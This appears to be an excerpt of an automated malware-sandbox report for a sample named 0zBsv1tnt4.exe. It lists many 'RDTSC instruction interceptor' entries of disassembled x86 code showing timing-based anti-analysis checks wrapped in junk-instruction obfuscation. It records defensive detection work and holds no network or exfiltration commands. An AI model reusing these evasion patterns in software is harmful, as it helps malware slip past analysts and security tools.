Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458A2 second address: C458D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007FC22D01ECD8h 0x0000000f jmp 00007FC22D01ECCAh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458D2 second address: C458DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C458DB second address: C458EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45A58 second address: C45A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45A65 second address: C45A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45D39 second address: C45D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007FC22CC1B8B6h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45EDB second address: C45EF9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECD2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45EF9 second address: C45EFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4604E second address: C46052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46052 second address: C46058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46058 second address: C46064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC22D01ECC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46064 second address: C46068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C46068 second address: C4606C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4606C second address: C46092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FC22CC1B8ACh 0x00000016 jmp 00007FC22CC1B8AAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C491BF second address: C491C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492BA second address: C492C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492C4 second address: C492CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C492CA second address: C492CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C103 second address: B5C107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5120437 second address: 51204CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FC22CC1B8AAh 0x0000000c or ax, 6F98h 0x00000011 jmp 00007FC22CC1B8ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC22CC1B8B4h 0x00000022 adc esi, 780699F8h 0x00000028 jmp 00007FC22CC1B8ABh 0x0000002d popfd 0x0000002e mov ch, 63h 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 pushad 0x00000034 mov dx, 77D4h 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FC22CC1B8B3h 0x0000003f sub ecx, 33370A6Eh 0x00000045 jmp 00007FC22CC1B8B9h 0x0000004a popfd 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e popad 0x0000004f mov edx, dword ptr [ebp+0Ch] 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51204CE second address: 51204D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 512056F second address: 5120587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150774 second address: 5150820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 jmp 00007FC22D01ECD3h 0x0000000e popfd 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebp 0x00000016 jmp 00007FC22D01ECD0h 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007FC22D01ECD0h 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC22D01ECCEh 0x0000002c jmp 00007FC22D01ECD5h 0x00000031 popfd 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007FC22D01ECCAh 0x0000003c push eax 0x0000003d jmp 00007FC22D01ECCBh 0x00000042 xchg eax, ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FC22D01ECD5h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150820 second address: 5150844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4B739FA2h 0x00000008 mov edi, 0F1013EEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8B1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150844 second address: 515088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov ax, 2C03h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-04h] 0x00000019 pushad 0x0000001a movzx eax, bx 0x0000001d mov ebx, 29D597DCh 0x00000022 popad 0x00000023 push ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC22D01ECD7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150930 second address: 5150934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150934 second address: 5150951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150998 second address: 51509EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c jmp 00007FC22CC1B8ACh 0x00000011 jmp 00007FC22CC1B8B2h 0x00000016 popad 0x00000017 pop esi 0x00000018 jmp 00007FC22CC1B8B0h 0x0000001d leave 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51509EE second address: 51509F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51509F3 second address: 5150A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A09 second address: 5150A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A0D second address: 514002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007FC22CC1BA0Ah 0x0000001a mov dword ptr [esp], 0000000Dh 0x00000021 call 00007FC2313D7A41h 0x00000026 mov edi, edi 0x00000028 jmp 00007FC22CC1B8B0h 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC22CC1B8B7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514002C second address: 51400C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECCFh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC22D01ECCBh 0x00000015 sub cx, 636Eh 0x0000001a jmp 00007FC22D01ECD9h 0x0000001f popfd 0x00000020 mov ax, 24F7h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC22D01ECD8h 0x0000002d add esi, 21A48A18h 0x00000033 jmp 00007FC22D01ECCBh 0x00000038 popfd 0x00000039 jmp 00007FC22D01ECD8h 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 mov edi, eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51400C2 second address: 51400C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51400C6 second address: 514010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, cx 0x00000009 popad 0x0000000a sub esp, 2Ch 0x0000000d jmp 00007FC22D01ECD0h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC22D01ECCEh 0x0000001a or ecx, 717EDE08h 0x00000020 jmp 00007FC22D01ECCBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 mov ecx, 3A80EC95h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514010D second address: 5140111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140111 second address: 5140134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC22D01ECD1h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, bx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140134 second address: 51401A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC22CC1B8B0h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FC22CC1B8ABh 0x0000000f sbb ah, 0000005Eh 0x00000012 jmp 00007FC22CC1B8B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c jmp 00007FC22CC1B8AEh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC22CC1B8ACh 0x0000002b sub ax, 8788h 0x00000030 jmp 00007FC22CC1B8ABh 0x00000035 popfd 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51401E2 second address: 51401E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51401E8 second address: 5140297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FC22CC1B8AAh 0x00000013 add si, 3EA8h 0x00000018 jmp 00007FC22CC1B8ABh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f call 00007FC22CC1B8B9h 0x00000024 pushfd 0x00000025 jmp 00007FC22CC1B8B0h 0x0000002a or eax, 1A50EC38h 0x00000030 jmp 00007FC22CC1B8ABh 0x00000035 popfd 0x00000036 pop esi 0x00000037 popad 0x00000038 mov edi, 00000000h 0x0000003d pushad 0x0000003e mov edx, esi 0x00000040 mov ecx, 53A136BDh 0x00000045 popad 0x00000046 inc ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 0x0000004c pushfd 0x0000004d jmp 00007FC22CC1B8ABh 0x00000052 xor cx, AEAEh 0x00000057 jmp 00007FC22CC1B8B9h 0x0000005c popfd 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140297 second address: 514029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514029D second address: 51402B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop ebx 0x0000000f jmp 00007FC22CC1B8ACh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402B9 second address: 51402BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402BF second address: 51402C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51402C3 second address: 5140302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FC22D01EE4Dh 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 lea ecx, dword ptr [ebp-14h] 0x00000019 jmp 00007FC22D01ECD5h 0x0000001e mov dword ptr [ebp-14h], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140302 second address: 5140306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140306 second address: 514030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514030A second address: 5140310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403C8 second address: 51403CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403CC second address: 51403E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403E3 second address: 5140487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 sub cx, 8FBEh 0x0000000e jmp 00007FC22D01ECD9h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jg 00007FC29EB0CD38h 0x0000001f jmp 00007FC22D01ECCCh 0x00000024 js 00007FC22D01ECF7h 0x0000002a jmp 00007FC22D01ECD0h 0x0000002f cmp dword ptr [ebp-14h], edi 0x00000032 pushad 0x00000033 movzx ecx, di 0x00000036 push ebx 0x00000037 movzx ecx, bx 0x0000003a pop ebx 0x0000003b popad 0x0000003c jne 00007FC29EB0CD12h 0x00000042 jmp 00007FC22D01ECCEh 0x00000047 mov ebx, dword ptr [ebp+08h] 0x0000004a jmp 00007FC22D01ECD0h 0x0000004f lea eax, dword ptr [ebp-2Ch] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FC22D01ECCAh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140487 second address: 5140496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140496 second address: 51404C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECCDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51404C3 second address: 51404FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC22CC1B8B1h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC22CC1B8ADh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51404FA second address: 5140558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6A3D4A12h 0x00000008 pushfd 0x00000009 jmp 00007FC22D01ECD3h 0x0000000e sub si, 720Eh 0x00000013 jmp 00007FC22D01ECD9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FC22D01ECCAh 0x00000026 add cx, 8088h 0x0000002b jmp 00007FC22D01ECCBh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140558 second address: 5140617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC22CC1B8B6h 0x0000000c sub ecx, 4760E2E8h 0x00000012 jmp 00007FC22CC1B8ABh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC22CC1B8AFh 0x00000021 add si, DA2Eh 0x00000026 jmp 00007FC22CC1B8B9h 0x0000002b popfd 0x0000002c mov edx, eax 0x0000002e popad 0x0000002f nop 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC22CC1B8B8h 0x00000037 and cl, FFFFFFD8h 0x0000003a jmp 00007FC22CC1B8ABh 0x0000003f popfd 0x00000040 mov esi, 2989AD8Fh 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FC22CC1B8B2h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FC22CC1B8B3h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140617 second address: 514061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514067C second address: 51406AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FC22CC1B8B7h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8ABh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51406AC second address: 51307F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 popad 0x0000000a je 00007FC29EB0CC5Bh 0x00000010 xor eax, eax 0x00000012 jmp 00007FC22CFF83FAh 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a leave 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 mov esi, eax 0x00000024 xor ebx, ebx 0x00000026 cmp esi, 00000000h 0x00000029 je 00007FC22D01EE05h 0x0000002f call 00007FC2317CB4F7h 0x00000034 mov edi, edi 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51307F0 second address: 5130803 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC22CC1B8AAh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130803 second address: 513083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FC22D01ECD6h 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC22D01ECD7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 513083D second address: 5130879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC22CC1B8ABh 0x0000000b xor esi, 0B459B0Eh 0x00000011 jmp 00007FC22CC1B8B9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130879 second address: 513087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 513087D second address: 5130883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130883 second address: 51308DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD0h 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov esi, 34900AC9h 0x00000015 pushfd 0x00000016 jmp 00007FC22D01ECD6h 0x0000001b sbb eax, 25B9F718h 0x00000021 jmp 00007FC22D01ECCBh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov esi, 655FDCE1h 0x00000031 mov cx, 661Dh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140A99 second address: 5140AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140AA9 second address: 5140AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
